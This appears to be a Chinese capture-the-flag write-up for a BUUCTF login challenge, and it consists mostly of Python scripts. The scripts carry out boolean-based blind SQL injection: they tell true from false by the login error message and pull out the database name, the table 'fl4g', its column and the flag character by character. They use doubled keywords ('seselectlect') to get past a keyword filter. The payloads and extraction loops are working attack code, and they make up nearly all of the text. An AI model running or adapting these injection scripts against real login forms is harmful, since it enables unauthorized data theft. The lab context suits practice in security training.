经分析后可知:当输入admin’ and 1=3# 时返回为假 {“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"}
当输入admin’ and 1=1# 时返回为真{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"}
根据返回的字符串,我们可以写出解决的python脚本
#数据库名字长度
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
for i in range(0,30):
key="admin' and length(database())="+str(i)+"#"
data={'name':key,'pass':'123'}
r=requests.post(url,data=data).text
if true in r:
print("the length is",i)
#数据库名
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=4
name=""
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(1,length+1):
for j in range(32,128):
key="admin' and ascii(substr(database(),%d,1))=%d#"%(i,j)
data={'name':key,'pass':'123'}
r=requests.post(url,data=data).text
if true in r:
name=name+chr(j)
print(name)
#表长度
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=4
name=""
database="note"
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(1,30):
key="admin' and length((seselectlect table_name FROM information_schema.tables WHERE table_schema='note' limit 0,1))="+str(i)+"#"
data={'name':key,'pass':'123'}
r=requests.post(url,data=data).text
if true in r:
print("the length of table is:",i)
#表名
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=4
name=""
database="note"
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(1,length+1):
for j in range(32,128):
key="admin' and ascii(substr((seselectlect table_name FROM information_schema.tables WHERE table_schema='note' limit 0,1),%d,1))=%d#"%(i,j)
data={'name':key,'pass':'123'}
r=requests.post(url,data=data).text
if true in r:
print(chr(j))
#列长度
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=4
name=""
database="note"
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(0,30):
key="admin' and length((seselectlect column_name FROM information_schema.columns WHERE table_name='fl4g' limit 0,1))="+str(i)+"#"
data={'name':key,'pass':'123'}
r=requests.post(url,data=data).text
if true in r:
print("the length of conlumn of 'fl4g' is:",i)
#列名
import string
import requests
url="http://624475d0-c1d1-4457-9cf0-4a6967a5ac83.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=4
name=""
database="note"
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(1,length+1):
for j in range(32,128):
key="admin' and ascii(substr((seselectlect column_name FROM information_schema.columns WHERE table_name='fl4g' limit 0,1),%d,1))=%d#"%(i,j)
data={'name':key,'pass':'123'}
r=requests.post(url,data=data).text
if true in r:
name=name+chr(j)
print(name)
#flag长度
import string
import requests
url="http://624475d0-c1d1-4457-9cf0-4a6967a5ac83.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=4
name=""
database="note"
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(0,60):
key="admin' and length((seselectlect flag from fl4g limit 0,1))="+str(i)+"#"
data = {'name': key, 'pass': '123'}
r = requests.post(url, data=data).text
if true in r:
print("the length of column is:",i)
#flag
import string
import requests
url="http://624475d0-c1d1-4457-9cf0-4a6967a5ac83.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=26
flag=""
database="note"
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(1,length+1):
for j in dic:
key="admin' and (ascii(substr((seselectlect flag FROM fl4g limit 0,1),%d,1))="%i+str(ord(j))+")#"
data={'name':key,'pass':'123'}
r=requests.post(url,data=data).text
if true in r:
flag=flag+j
print(flag)